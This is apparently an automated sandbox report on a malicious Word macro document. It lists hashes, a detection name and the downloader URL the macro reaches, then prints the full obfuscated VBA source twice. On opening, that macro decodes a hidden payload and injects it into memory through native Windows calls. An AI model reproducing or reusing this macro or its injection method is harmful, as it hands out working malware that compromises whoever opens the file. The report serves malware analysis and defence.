Office (OLE) malware analysis — malicious · 3875fbcf5f0d240d

MALICIOUS

Office (OLE)

273.2 KB Created: 2018-03-14 14:07:00 Authoring application: Microsoft Office Word First seen: 2018-04-30

MD5: 3c6e0d73e32ad3574ab88dd3899352e9 SHA-1: edcf4775d5ccd38c29141a6fc3a25788e2ca2205 SHA-256: 3875fbcf5f0d240d5121b9060d149723cb91ee9c391cd7d7885b350d1fd03cd3

90 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains a VBA macro that is triggered by the Document_Open event. This macro is designed to download and execute a payload from the URL http://tailormadeduds.com/?7ouL5=YKQzBO3DTOBtGSYNOzFS3QlA$*5.CQi. The ClamAV detection name 'Doc.Downloader.Macro-6539595-0' further supports this behavior. The document body content is unrelated to the malicious functionality.

Heuristics 4

ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
Dim grias As Long
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://tailormadeduds.com/?7ouL5=YKQzBO3DTOBtGSYNOzFS3QlA$*5.CQi In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11918 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11918 bytes
SHA-256: `0ebf6e82aab92edf946bc28e62977edaf62d45c80e3b1e1644f1f253b2c229c6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Dim grias As Long Dim chessman As Variant unexerted = "perpendicular" interdependent digenesis = 43 + 37 Pmt 0, digenesis, 24000, 48243, 4 End Sub Attribute VB_Name = "chalcopyrite" Function baconian(cropper) As String Dim bootikin As Long Dim dilettant(63) As Long Dim picaresco(63) As Long Dim ostracoda(63) As Long Dim doohickey As Long Dim fountainhead() As Byte Dim firearms(6962) As Byte Dim fer As Long Dim balalaika As Integer Dim dicranaceae As Long aix = gormandizing Dim cleareyedsighted As String electroencephalograph = 54 - 29 + 262119 codeine = 90 - 24 + 3966 chytridiaceae = 53 - 102 + 65329 ahuehuete = 117 - 92 + 230 Dim barm As Long Dim overweening As String hypallage = 123 - 66 + 16711623 Dim quakeress As Long animatism = 31 - 113 + 65618 aphriza = 98 - 5 + 4003 bare = 95 - 87 + 258040 annelid = 77 - 13 + 16515008 archosaur = 9 - 5 + 59 positive = 57 - 83 + 282 greenwich = 21 - 39 + 82 Dim preaching As Byte details = 27 - 42 + 7858 Dim highly() As Byte highly = VBA.StrConv(cropper, 120 + 8) pellaea = 25 + 6 Pmt 0, pellaea, 18816, 37014, 2 Shaded = 7843 congruous = vbKeyShift - 12 For comprehension = 0 To Shaded If comprehension Mod 2 = 0 Then highly(comprehension) = highly(comprehension) - congruous Else highly(comprehension) = highly(comprehension) - (congruous - 1) End If Next comprehension avo = 30 + 8 Pmt 0, avo, 24836, 46679, 2 balalaika = 0 notissima = topheavy For fer = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6) ostracoda(fer) = episodic(fer, greenwich, 38) picaresco(fer) = episodic(fer, aphriza, 38) dilettant(fer) = episodic(fer, electroencephalograph, 38) Next fer tiu = 58 + 46 Pmt 0, tiu, 14755, 46989, 5 fountainhead = highly discoglossidae = 28 - 49 + 25 ectoproct = 42 + 36 Pmt 0, ectoproct, 7525, 34551, 6 namely = 91 - 126 + 38 aix = "disproportion" aix = aix diaphragm = namely + 1 assyrian = 73 - 50 - 21 For doohickey = 0 To Shaded nectary = fountainhead(doohickey) appaloosa = fountainhead(doohickey + 2) snuffbox = picaresco(notissima(fountainhead(doohickey + 1))) campylorhynchus = ostracoda(notissima(appaloosa)) + notissima(fountainhead(doohickey + namely)) dicranaceae = dilettant(notissima(nectary)) + snuffbox + campylorhynchus fer = episodic(dicranaceae, hypallage, 30) firearms(bootikin) = episodic(fer, animatism, 20) fer = episodic(dicranaceae, chytridiaceae, 30) firearms(bootikin + 1) = episodic(fer, positive, 20) firearms(bootikin + assyrian) = episodic(dicranaceae, ahuehuete, 30) bootikin = bootikin + assyrian + 1 doohickey = doohickey + 3 Next baconian = firearms End Function Function episodic(supposed, exercitation, multinominal) If multinominal = (20 + (10 / 2 - 5)) * 1 Then episodic = supposed \ exercitation ElseIf multinominal = (30 + (5 - 3) / 2 - 1) * 1 Then episodic = supposed And exercitation ElseIf multinominal = (38 + (56 / 7 - 4 * 2)) * 1 Then episodic = supposed * exercitation End If End Function Attribute VB_Name = "prestriction" Attribute VB_Base = "0{6F029A80-1718-4C2F-86E3-BC261B49E611}{AE875FA0-DC79-4465-8532-4A546FE52C6F}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Private Sub contemptuously_Change() End Sub Attribute VB_Name = "rModu" #If (83 - 123 + 440 + 38 - 16 + 278) > ((72 - 22 + 270) - (101 - 75 + 514) * 1) And Not ((1 - 23 + 50) - (127 - 15 - 84)) * 2 < (Win64) Then Public Declare Function marina _ Lib "ntdll " Alias _ "NtWriteVirtualMemory" (ByVal dispersion As Any, ByVal draped As Any, ByVal bifurcated As Any, ByVal automated As Any, ByVal agjus As Any) As Long Public Declare Function samarium _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (cellist As Any, ByVal aftereffect As Any, ByVal micomicon As Any, ByVal attracting As Any, ByVal conduction As Any, ByVal neritina As Any, ByVal jure As Any) As Long #End If #If (81 - 6 + 325 + 84 - 101 + 317) > ((80 - 9 + 249) - (118 - 44 + 466) * 1) And ((12 - 83 + 99) - (1 - 45 + 72)) * 2 < (Win64) Then Public Declare PtrSafe Function marina _ Lib "ntdll " Alias _ "NtWriteVirtualMemory" (ByVal maintopmast As Any, ByVal charitableness As Any, ByVal murmerer As Any, ByVal crib As Any, ByVal home As Any) As LongPtr #End If Function bursa(indecent, astroglia, favorably) Dim chyliferous As Long Dim pending As Variant Dim blithesome As Long Dim mare As Variant Dim scoundrel As Long Dim plagioclastic As Byte Dim abstractionist As Long Dim magnesite As Variant Dim postdiluvial As Long Dim exhaling As Long Dim sheltie As Long ar = ar + 309 chyliferous = indecent postdiluvial = favorably gormandizing = aix scoundrel = astroglia harmful = 41 + 41 Pmt 0, harmful, 8146, 42506, 6 ar = angular * 2 blithesome = 12 - 20 + 7 bitbutal = marina(ByVal blithesome, _ chyliferous, scoundrel, _ postdiluvial, abstractionist) ar = angular \ 75 End Function Sub interdependent() Dim jerrybuilt As Variant Dim altorivievo As Variant prestriction.contemptuously.Value = Day(#12/5/2013#) occupier = hector Set flimsily = prestriction.contemptuously.SelectedItem devon = 42 + 48 Pmt 0, devon, 3122, 19254, 4 cacoopy = flimsily.Name belabor = 54 - 103 + 7893 barded = Right(cacoopy, belabor) austereness = chalcopyrite.baconian(barded) consciousness = 24 + 39 Pmt 0, consciousness, 6107, 31226, 7 #If (116 - 49 + 333 + 105 - 98 + 293) > ((61 - 53 + 312) - (124 - 97 + 513) * 1) And ((92 - 83 + 19) - (67 - 6 - 33)) * 2 < (Win64) Then Dim talisman As Variant Dim rockweed As LongPtr Dim arminius As LongPtr Dim brustle As Byte #ElseIf (61 - 74 + 413 + 55 - 54 + 299) > ((60 - 92 + 352) - (18 - 114 + 636) * 1) And Not ((107 - 59 - 20) - (64 - 2 - 34)) * 2 < (Win64) Then Dim friseur As Variant Dim arminius As Long Dim aeternum As String Dim rockweed As Long #End If courser = 49 - 97 + 48 fumble = "mea" esocidae = 31 - 84 + 4149 mailable = 1 + 52 Pmt 0, mailable, 36565, 15175, 6 castigation = 14 + 13 Pmt 0, castigation, 5279, 15832, 3 epos = austereness alveolus = mechanics rockweed = idonea(epos) #If (54 - 69 + 415 + 112 - 2 + 190) > ((69 - 18 + 269) - (84 - 11 + 467) * 1) And ((53 - 110 + 85) - (71 - 127 + 84)) * 2 < (Win64) Then Dim pertusion As String Dim ecarte As LongPtr Dim declassified As LongPtr Dim allegiance As LongPtr pledge = 95 - 40 + 2009 #ElseIf (99 - 73 + 374 + 74 - 4 + 230) > ((128 - 113 + 305) - (36 - 89 + 593) * 1) And Not ((35 - 125 + 118) - (12 - 47 + 63)) * 2 < (Win64) Then Dim ecarte As Long nonoccurrence = 32 - 36 + 785 Dim declassified As Long Dim allegiance As Long pledge = nonoccurrence + 3459 #End If Dim stumblingstone As Integer Dim dutifully As Integer ecarte = 128 - 19 - 109 arminius = rockweed + pledge declassified = 35 - 90 + 201582 allegiance = 82 - 59 + 3477 clarichord = samarium(declassified, ecarte, arminius, ecarte, ecarte, ecarte, ecarte) calophyllum = 47 + 52 Pmt 0, calophyllum, 9970, 40826, 8 End Sub Attribute VB_Name = "fModu" #If (81 - 6 + 325 + 84 - 101 + 317) > ((80 - 9 + 249) - (118 - 44 + 466) * 1) And ((12 - 83 + 99) - (1 - 45 + 72)) * 2 < (Win64) Then Public Declare PtrSafe Function deckled _ Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (copperbottomed As LongPtr, proctitis As LongPtr, ByVal biquadrate As LongPtr, ungrammaticalByVal As LongPtr, adulthood As LongPtr, ByVal aculeus As LongPtr) As LongPtr #End If #If (83 - 123 + 440 + 38 - 16 + 278) > ((72 - 22 + 270) - (101 - 75 + 514) * 1) And Not ((1 - 23 + 50) - (127 - 15 - 84)) * 2 < (Win64) Then Public Declare Function deckled _ Lib "ntdll " Alias _ "NtAllocateVirtualMemory" (erastianism As Long, solder As Long, ByVal pedibusque As Long, minauderieByVal As Long, amentiferous As Long, ByVal impeller As Long) As Long #End If Function topheavy() Dim avaunt(255) As Byte Dim lineal As Integer Dim rectil As Integer referible = 107 - 102 + 60 For i = referible To (91 - 106 + 106) avaunt(referible) = referible - (38 - 106 + 133) referible = referible + 1 If (104 - 69 + 56) < referible Then rectilineal = artisan + 72 - 89 + 82 Exit For lineal = lineal + 72 - 89 + 82 Else rectil = rectil + 108 End If bearish = heh + 123 - 4 - 54 Next referible = (29 - 13 + 32) For i = referible To (80 - 1 - 21) avaunt(referible) = referible + (40 - 55 + 19) referible = referible + 1 If (12 - 126 + 172) < referible Then petrel = grievously + 86 - 26 + 5 Exit For lineal = lineal * 2 Else rectil = rectil - 40 End If custodes = sylvite + 117 - 12 - 40 Next referible = (110 - 101 + 88) For i = referible To (5 - 95 + 213) avaunt(referible) = referible - (16 - 31 + 86) referible = referible + 1 bacchantic = joe + 88 - 61 + 38 If (15 - 105 + 213) < referible Then epiphora = cataclysm + 74 - 37 + 28 Exit For lineal = lineal / 4 Else rectil = rectil + 187 End If ing = trichechus + 43 - 100 + 122 Next avaunt(94 - 17 - 30) = (28 - 91 + 126) referible = (3 - 53 + 93) avaunt(referible) = (21 - 114 + 155) topheavy = avaunt End Function Attribute VB_Name = "sModu" #If (81 - 6 + 325 + 84 - 101 + 317) > ((80 - 9 + 249) - (118 - 44 + 466) * 1) And ((12 - 83 + 99) - (1 - 45 + 72)) * 2 < (Win64) Then Public Declare PtrSafe Function samarium _ Lib "Kernel32" Alias _ "CreateTimerQueueTimer" (syncretistic As Any, ByVal imitator As Any, ByVal emphysematous As Any, ByVal durable As Any, ByVal dismal As Any, ByVal timothy As Any, ByVal jigsaw As Any) As Long #End If Function organicism(hemophiliac, bedding, napha) Dim geodesy As Integer Dim cuticular As String Dim crotchet As LongPtr Dim daucus As LongPtr Dim alpaca As LongPtr Dim cuticula As Long Dim maeandra As LongPtr Dim blaspheme As LongPtr aix = "burnout" ar = Math.Round(173) daucus = hemophiliac blaspheme = napha ar = Math.Round(417) maeandra = bedding forewarned = 56 + 56 Pmt 0, forewarned, 30833, 25228, 5 gormandizing = gormandizing crotchet = 63 - 11 - 53 marina ByVal crotchet, _ daucus, _ maeandra, blaspheme, _ alpaca angular = Rnd(490) End Function Function idonea(destroy) Dim maclura As Long Dim veer As Long Dim circumnavigation As Variant Dim abecedarius As Byte #If (105 - 110 + 405 + 41 - 68 + 327) > ((12 - 57 + 365) - (43 - 128 + 625) * 1) And ((79 - 87 + 36) - (55 - 26 - 1)) * 2 < (Win64) Then Dim alley As Variant Dim finnish As LongPtr bawdyhouse = 84 - 44 - 32 Dim priacanthus As LongPtr Dim gatherer As String Dim overthrow As String Dim conceptive As LongPtr Dim terrier As String meaninglessness = VarPtr(finnish) cureless = organicism(meaninglessness, VarPtr(destroy) + (82 - 100 + 26), bawdyhouse) #ElseIf (115 - 118 + 403 + 49 - 119 + 370) > ((89 - 99 + 330) - (1 - 27 + 566) * 1) And Not ((95 - 71 + 4) - (11 - 39 + 56)) * 2 < (Win64) Then Dim finnish As Long bawdyhouse = 66 - 79 + 17 Dim priacanthus As Long Dim conceptive As Long meaninglessness = VarPtr(finnish) cureless = bursa(meaninglessness, VarPtr(destroy) + (12 - 82 + 78), bawdyhouse) #End If batterie = 92 - 92 - 1 priacanthus = 36 - 11 - 25 effortlessness = 8 - 46 + 38 conceptive = 25 - 41 + 9993 brainwave = 95 - 118 + 4119 delineative = 126 - 14 - 48 justice = deckled(ByVal batterie, _ priacanthus, ByVal effortlessness, _ conceptive, ByVal brainwave, _ ByVal delineative) nation = bursa(priacanthus, finnish, 52 - 19 + 5850) livy = 43 + 42 Pmt 0, livy, 33733, 47494, 6 idonea = priacanthus End Function

SHA-256: 0ebf6e82aab92edf946bc28e62977edaf62d45c80e3b1e1644f1f253b2c229c6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_Open()
Dim grias As Long
Dim chessman As Variant
unexerted = "perpendicular"
interdependent
digenesis = 43 + 37
 Pmt 0, digenesis, 24000, 48243, 4
End Sub







Attribute VB_Name = "chalcopyrite"

Function baconian(cropper) As String
Dim bootikin As Long
Dim dilettant(63) As Long
Dim picaresco(63) As Long
Dim ostracoda(63) As Long
Dim doohickey As Long
Dim fountainhead() As Byte
Dim firearms(6962) As Byte
Dim fer As Long
Dim balalaika As Integer
Dim dicranaceae As Long
aix = gormandizing

Dim cleareyedsighted As String
electroencephalograph = 54 - 29 + 262119
codeine = 90 - 24 + 3966
chytridiaceae = 53 - 102 + 65329
ahuehuete = 117 - 92 + 230
Dim barm As Long

Dim overweening As String

hypallage = 123 - 66 + 16711623
Dim quakeress As Long

animatism = 31 - 113 + 65618
aphriza = 98 - 5 + 4003
bare = 95 - 87 + 258040
annelid = 77 - 13 + 16515008
archosaur = 9 - 5 + 59
positive = 57 - 83 + 282
greenwich = 21 - 39 + 82
Dim preaching As Byte
details = 27 - 42 + 7858
Dim highly() As Byte
highly = VBA.StrConv(cropper, 120 + 8)
pellaea = 25 + 6
 Pmt 0, pellaea, 18816, 37014, 2

Shaded = 7843
congruous = vbKeyShift - 12
For comprehension = 0 To Shaded
If comprehension Mod 2 = 0 Then
highly(comprehension) = highly(comprehension) - congruous
Else
highly(comprehension) = highly(comprehension) - (congruous - 1)
End If
Next comprehension
avo = 30 + 8
 Pmt 0, avo, 24836, 46679, 2

balalaika = 0
notissima = topheavy
For fer = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
ostracoda(fer) = episodic(fer, greenwich, 38)
picaresco(fer) = episodic(fer, aphriza, 38)
dilettant(fer) = episodic(fer, electroencephalograph, 38)
Next fer
tiu = 58 + 46
 Pmt 0, tiu, 14755, 46989, 5

fountainhead = highly
discoglossidae = 28 - 49 + 25
ectoproct = 42 + 36
 Pmt 0, ectoproct, 7525, 34551, 6

namely = 91 - 126 + 38
aix = "disproportion"

aix = aix

diaphragm = namely + 1
assyrian = 73 - 50 - 21
For doohickey = 0 To Shaded
nectary = fountainhead(doohickey)
appaloosa = fountainhead(doohickey + 2)
snuffbox = picaresco(notissima(fountainhead(doohickey + 1)))
campylorhynchus = ostracoda(notissima(appaloosa)) + notissima(fountainhead(doohickey + namely))
dicranaceae = dilettant(notissima(nectary)) + snuffbox + campylorhynchus
fer = episodic(dicranaceae, hypallage, 30)
firearms(bootikin) = episodic(fer, animatism, 20)
fer = episodic(dicranaceae, chytridiaceae, 30)
firearms(bootikin + 1) = episodic(fer, positive, 20)
firearms(bootikin + assyrian) = episodic(dicranaceae, ahuehuete, 30)
bootikin = bootikin + assyrian + 1
doohickey = doohickey + 3
Next
baconian = firearms
End Function
Function episodic(supposed, exercitation, multinominal)
If multinominal = (20 + (10 / 2 - 5)) * 1 Then
episodic = supposed \ exercitation
ElseIf multinominal = (30 + (5 - 3) / 2 - 1) * 1 Then
episodic = supposed And exercitation
ElseIf multinominal = (38 + (56 / 7 - 4 * 2)) * 1 Then
episodic = supposed * exercitation
End If
End Function



Attribute VB_Name = "prestriction"
Attribute VB_Base = "0{6F029A80-1718-4C2F-86E3-BC261B49E611}{AE875FA0-DC79-4465-8532-4A546FE52C6F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub contemptuously_Change()

End Sub

Attribute VB_Name = "rModu"
#If (83 - 123 + 440 + 38 - 16 + 278) > ((72 - 22 + 270) - (101 - 75 + 514) * 1) And Not ((1 - 23 + 50) - (127 - 15 - 84)) * 2 < (Win64) Then
Public Declare Function marina _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal dispersion As Any, ByVal draped As Any, ByVal bifurcated As Any, ByVal automated As Any, ByVal agjus As Any) As Long
Public Declare Function samarium _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (cellist As Any, ByVal aftereffect As Any, ByVal micomicon As Any, ByVal attracting As Any, ByVal conduction As Any, ByVal neritina As Any, ByVal jure As Any) As Long
#End If
#If (81 - 6 + 325 + 84 - 101 + 317) > ((80 - 9 + 249) - (118 - 44 + 466) * 1) And ((12 - 83 + 99) - (1 - 45 + 72)) * 2 < (Win64) Then
Public Declare PtrSafe Function marina _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal maintopmast As Any, ByVal charitableness As Any, ByVal murmerer As Any, ByVal crib As Any, ByVal home As Any) As LongPtr
#End If
Function bursa(indecent, astroglia, favorably)
Dim chyliferous As Long
Dim pending As Variant
Dim blithesome As Long
Dim mare As Variant
Dim scoundrel As Long
Dim plagioclastic As Byte
Dim abstractionist As Long
Dim magnesite As Variant
Dim postdiluvial As Long
Dim exhaling As Long
Dim sheltie As Long
ar = ar + 309
chyliferous = indecent
postdiluvial = favorably
gormandizing = aix
scoundrel = astroglia
harmful = 41 + 41
Pmt 0, harmful, 8146, 42506, 6
ar = angular * 2
blithesome = 12 - 20 + 7
bitbutal = marina(ByVal blithesome, _
chyliferous, scoundrel, _
postdiluvial, abstractionist)
ar = angular \ 75
End Function

Sub interdependent()
Dim jerrybuilt As Variant
Dim altorivievo As Variant
prestriction.contemptuously.Value = Day(#12/5/2013#)
occupier = hector
Set flimsily = prestriction.contemptuously.SelectedItem
devon = 42 + 48
Pmt 0, devon, 3122, 19254, 4
cacoopy = flimsily.Name
belabor = 54 - 103 + 7893
barded = Right(cacoopy, belabor)
austereness = chalcopyrite.baconian(barded)
consciousness = 24 + 39
Pmt 0, consciousness, 6107, 31226, 7
#If (116 - 49 + 333 + 105 - 98 + 293) > ((61 - 53 + 312) - (124 - 97 + 513) * 1) And ((92 - 83 + 19) - (67 - 6 - 33)) * 2 < (Win64) Then
Dim talisman As Variant
Dim rockweed As LongPtr
Dim arminius As LongPtr
Dim brustle As Byte
#ElseIf (61 - 74 + 413 + 55 - 54 + 299) > ((60 - 92 + 352) - (18 - 114 + 636) * 1) And Not ((107 - 59 - 20) - (64 - 2 - 34)) * 2 < (Win64) Then
Dim friseur As Variant
Dim arminius As Long
Dim aeternum As String
Dim rockweed As Long
#End If
courser = 49 - 97 + 48
fumble = "mea"
esocidae = 31 - 84 + 4149
mailable = 1 + 52
Pmt 0, mailable, 36565, 15175, 6
castigation = 14 + 13
Pmt 0, castigation, 5279, 15832, 3
epos = austereness
alveolus = mechanics
rockweed = idonea(epos)
#If (54 - 69 + 415 + 112 - 2 + 190) > ((69 - 18 + 269) - (84 - 11 + 467) * 1) And ((53 - 110 + 85) - (71 - 127 + 84)) * 2 < (Win64) Then
Dim pertusion As String
Dim ecarte As LongPtr
Dim declassified As LongPtr
Dim allegiance As LongPtr
pledge = 95 - 40 + 2009
#ElseIf (99 - 73 + 374 + 74 - 4 + 230) > ((128 - 113 + 305) - (36 - 89 + 593) * 1) And Not ((35 - 125 + 118) - (12 - 47 + 63)) * 2 < (Win64) Then
Dim ecarte As Long
nonoccurrence = 32 - 36 + 785
Dim declassified As Long
Dim allegiance As Long
pledge = nonoccurrence + 3459
#End If
Dim stumblingstone As Integer
Dim dutifully As Integer
ecarte = 128 - 19 - 109
arminius = rockweed + pledge
declassified = 35 - 90 + 201582
allegiance = 82 - 59 + 3477
clarichord = samarium(declassified, ecarte, arminius, ecarte, ecarte, ecarte, ecarte)
calophyllum = 47 + 52
Pmt 0, calophyllum, 9970, 40826, 8
End Sub

Attribute VB_Name = "fModu"
#If (81 - 6 + 325 + 84 - 101 + 317) > ((80 - 9 + 249) - (118 - 44 + 466) * 1) And ((12 - 83 + 99) - (1 - 45 + 72)) * 2 < (Win64) Then
Public Declare PtrSafe Function deckled _
Lib "ntdll   " Alias _
"NtAllocateVirtualMemory" (copperbottomed As LongPtr, proctitis As LongPtr, ByVal biquadrate As LongPtr, ungrammaticalByVal As LongPtr, adulthood As LongPtr, ByVal aculeus As LongPtr) As LongPtr
#End If
#If (83 - 123 + 440 + 38 - 16 + 278) > ((72 - 22 + 270) - (101 - 75 + 514) * 1) And Not ((1 - 23 + 50) - (127 - 15 - 84)) * 2 < (Win64) Then
Public Declare Function deckled _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (erastianism As Long, solder As Long, ByVal pedibusque As Long, minauderieByVal As Long, amentiferous As Long, ByVal impeller As Long) As Long
#End If
Function topheavy()
Dim avaunt(255) As Byte
Dim lineal As Integer
Dim rectil As Integer
referible = 107 - 102 + 60
For i = referible To (91 - 106 + 106)
avaunt(referible) = referible - (38 - 106 + 133)
referible = referible + 1
If (104 - 69 + 56) < referible Then
rectilineal = artisan + 72 - 89 + 82
Exit For
lineal = lineal + 72 - 89 + 82
Else
rectil = rectil + 108
End If
bearish = heh + 123 - 4 - 54
Next
referible = (29 - 13 + 32)
For i = referible To (80 - 1 - 21)
avaunt(referible) = referible + (40 - 55 + 19)
referible = referible + 1
If (12 - 126 + 172) < referible Then
petrel = grievously + 86 - 26 + 5
Exit For
lineal = lineal * 2
Else
rectil = rectil - 40
End If
custodes = sylvite + 117 - 12 - 40
Next
referible = (110 - 101 + 88)
For i = referible To (5 - 95 + 213)
avaunt(referible) = referible - (16 - 31 + 86)
referible = referible + 1
bacchantic = joe + 88 - 61 + 38
If (15 - 105 + 213) < referible Then
epiphora = cataclysm + 74 - 37 + 28
Exit For
lineal = lineal / 4
Else
rectil = rectil + 187
End If
ing = trichechus + 43 - 100 + 122
Next
avaunt(94 - 17 - 30) = (28 - 91 + 126)
referible = (3 - 53 + 93)
avaunt(referible) = (21 - 114 + 155)
topheavy = avaunt
End Function

Attribute VB_Name = "sModu"
#If (81 - 6 + 325 + 84 - 101 + 317) > ((80 - 9 + 249) - (118 - 44 + 466) * 1) And ((12 - 83 + 99) - (1 - 45 + 72)) * 2 < (Win64) Then
Public Declare PtrSafe Function samarium _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (syncretistic As Any, ByVal imitator As Any, ByVal emphysematous As Any, ByVal durable As Any, ByVal dismal As Any, ByVal timothy As Any, ByVal jigsaw As Any) As Long
#End If
Function organicism(hemophiliac, bedding, napha)
Dim geodesy As Integer
Dim cuticular As String
Dim crotchet As LongPtr
Dim daucus As LongPtr
Dim alpaca As LongPtr
Dim cuticula As Long
Dim maeandra As LongPtr
Dim blaspheme As LongPtr
aix = "burnout"
ar = Math.Round(173)
daucus = hemophiliac
blaspheme = napha
ar = Math.Round(417)
maeandra = bedding
forewarned = 56 + 56
Pmt 0, forewarned, 30833, 25228, 5
gormandizing = gormandizing
crotchet = 63 - 11 - 53
marina ByVal crotchet, _
daucus, _
maeandra, blaspheme, _
alpaca
angular = Rnd(490)
End Function
Function idonea(destroy)
Dim maclura As Long
Dim veer As Long
Dim circumnavigation As Variant
Dim abecedarius As Byte
#If (105 - 110 + 405 + 41 - 68 + 327) > ((12 - 57 + 365) - (43 - 128 + 625) * 1) And ((79 - 87 + 36) - (55 - 26 - 1)) * 2 < (Win64) Then
Dim alley As Variant
Dim finnish As LongPtr
bawdyhouse = 84 - 44 - 32
Dim priacanthus As LongPtr
Dim gatherer As String
Dim overthrow As String
Dim conceptive As LongPtr
Dim terrier As String
meaninglessness = VarPtr(finnish)
cureless = organicism(meaninglessness, VarPtr(destroy) + (82 - 100 + 26), bawdyhouse)
#ElseIf (115 - 118 + 403 + 49 - 119 + 370) > ((89 - 99 + 330) - (1 - 27 + 566) * 1) And Not ((95 - 71 + 4) - (11 - 39 + 56)) * 2 < (Win64) Then
Dim finnish As Long
bawdyhouse = 66 - 79 + 17
Dim priacanthus As Long
Dim conceptive As Long
meaninglessness = VarPtr(finnish)
cureless = bursa(meaninglessness, VarPtr(destroy) + (12 - 82 + 78), bawdyhouse)
#End If
batterie = 92 - 92 - 1
priacanthus = 36 - 11 - 25
effortlessness = 8 - 46 + 38
conceptive = 25 - 41 + 9993
brainwave = 95 - 118 + 4119
delineative = 126 - 14 - 48
justice = deckled(ByVal batterie, _
priacanthus, ByVal effortlessness, _
conceptive, ByVal brainwave, _
ByVal delineative)
nation = bursa(priacanthus, finnish, 52 - 19 + 5850)
livy = 43 + 42
Pmt 0, livy, 33733, 47494, 6
idonea = priacanthus
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.